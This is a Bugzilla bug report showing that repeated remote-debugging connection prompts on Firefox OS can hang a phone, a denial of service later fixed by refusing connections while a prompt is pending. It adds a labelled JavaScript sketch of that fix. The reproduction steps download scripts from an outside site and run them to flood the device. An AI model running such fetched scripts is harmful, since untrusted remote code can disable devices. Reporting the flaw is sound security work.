Closed Bug 1022692 Opened 10 years ago Closed 9 years ago

"Allow incoming connections" dialogs stack up and eventually hang the phone.

Categories

(DevTools Graveyard :: WebIDE, defect)

ARM
Gonk (Firefox OS)
defect
Not set
normal

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: jujjyl, Unassigned)

Details

(Keywords: csectype-dos)

When initiating a DevTools connection to a phone, the dialog "Allow inbound remote debugging connection" pops up.

If another connection attempt is made and the user has not yet closed the previous dialog, these dialogs will start stacking up. Eventually the phone will hang and stop accepting debug connections, and any other system dialogs will no longer open up either. E.g. pressing the power button will not show the "turn off/restart" options, and the user must hard-reboot the phone by holding down the power button.

STR:
1. Have the device plugged in on USB, with ADB and DevTools options enabled.
2. Make sure the pref devtools.debugger.prompt-connection is at its default unset value (true).
3. Execute these on the command line:

wget http://clb.demon.fi/bugs/ffdos/ffdb_dos.py
chmod +x ffdb_dos.py
wget http://clb.demon.fi/bugs/ffdos/ffdos.sh
chmod +x ffdos.sh
./ffdos.sh

The last line will start a barrage of incoming debug connection attempts. Wait some 10 minutes and try operating the phone.

While ffdos.sh is running, 'adb logcat' will start spamming

I/GeckoDump( 3442): Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8
E/GeckoConsole( 3442): [JavaScript Error: "Handler function DebuggerServer.onSocketAccepted threw an exception: InternalError: too much recursionLine: 553, column: 8" {file: "resource://gre/modules/commonjs/toolkit/loader.js -> resource://gre/modules/devtools/DevToolsUtils.js" line: 60}]

Expected: When a DevTools connection attempt is performed and the dialog is open, no other connection attempts are allowed until the user has acknowledged that dialog. All such attempts should effectively close the incoming socket connection immediately, instead of e.g. letting new inbound socket connections stack up.
I don't see any security issue here.
Group: core-security
Well, given that the whole dialog was implemented to provide a security barrier, I thought it is equally a security issue if one can use that barrier against its intent to crash the phone.
Sure, a Denial of Service is a type of security problem but usually not one we need to keep hidden.
Keywords: csectype-dos
As of bug 1127004, the dialogs no longer stack. New connections are denied if a different one is waiting on a prompt.
Status: NEW → RESOLVED
Closed: 9 years ago
Depends on: 1127004
Resolution: --- → FIXED
Product: Firefox → DevTools
Product: DevTools → DevTools Graveyard
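
The behaviour requested under "Expected" and described in the closing comment (a new connection is denied while a different one is waiting on a prompt) can be sketched as a small admission gate. This is an added example, not code from bug 1127004 or from the DevTools source; PromptGate, makeConn and simulateBurst are hypothetical names, and the connection objects are constructed stand-ins.

```javascript
// Added example (not DevTools code): at most one connection prompt at a time.
class PromptGate {
  constructor(showPrompt) {
    this.showPrompt = showPrompt; // hypothetical callback that opens ONE dialog
    this.pending = null;          // connection currently awaiting the user
    this.denied = 0;              // attempts refused while a dialog was open
  }
  // Called for every accepted socket; returns "prompting" or "denied".
  onSocketAccepted(conn) {
    if (this.pending !== null) {
      conn.close();               // close immediately, never queue or stack
      this.denied += 1;
      return "denied";
    }
    this.pending = conn;
    this.showPrompt(conn);
    return "prompting";
  }
  // Called once when the user dismisses the dialog.
  answer(allow) {
    const conn = this.pending;
    if (conn === null) return null; // stale answer, nothing is pending
    this.pending = null;
    if (allow) conn.authenticated = true;
    else conn.close();
    return conn;
  }
}

// Constructed stand-in for a debugger transport; tracks open/closed only.
function makeConn(id) {
  return { id, open: true, authenticated: false, close() { this.open = false; } };
}

// Constructed scenario: n attempts arrive before the user reacts.
function simulateBurst(n) {
  let dialogs = 0;
  const gate = new PromptGate(() => { dialogs += 1; });
  const conns = Array.from({ length: n }, (_, i) => makeConn(i));
  const results = conns.map((c) => gate.onSocketAccepted(c));
  const summary = { dialogs, denied: gate.denied, first: results[0],
                    stillOpen: conns.filter((c) => c.open).length };
  gate.answer(false);           // user rejects the single dialog
  summary.afterAnswer = gate.onSocketAccepted(makeConn(n)); // gate is free again
  return summary;
}

console.log(simulateBurst(1000));
```

State stays constant no matter how many attempts arrive: one dialog, one open socket, and every other socket closed on arrival.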